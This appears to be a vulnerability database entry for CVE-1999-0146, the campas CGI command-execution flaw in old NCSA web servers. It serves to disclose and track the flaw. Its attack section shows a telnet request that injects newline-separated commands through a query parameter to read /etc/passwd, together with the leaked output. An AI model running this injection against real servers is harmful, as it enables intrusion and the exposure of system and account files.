Brief description: Campas cgi-bin file executes remote commands
Full description: The campas (1) CGI program allows a remote attacker to execute commands on a web server with the privileges of the user owning the server process. The campas program is included as a sample CGI program in some older versions of the NCSA web server.
Components: NCSA web server cgi
Systems:
Effect(s) of exploiting: Remote user can execte command with privileges of web server
Detecting the hole:
Fixing the hole:
Other information:
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0146 -- The campas CGI program provided with some NCSA web servers allows an attacker to read arbitrary files. [DOVES note: this is not quite right. It allows execution of arbitrary programs. See the attack.]
Attack:
> telnet www.xxxx.net 80 Trying 200.xx.xx.xx... Connected to venus.xxxx.net Escape character is '^]'. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a root:x:0:1:Super-User:/export/home/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/:/bin/false ...
Advisories: ISS X-Force database entry http-cgi-campas ; Security Focus notification ;
Related Vulnerabilities:
Reporting: Francisco Torres in Bugtraq (Tue Jul 15 1997 18:24:31 )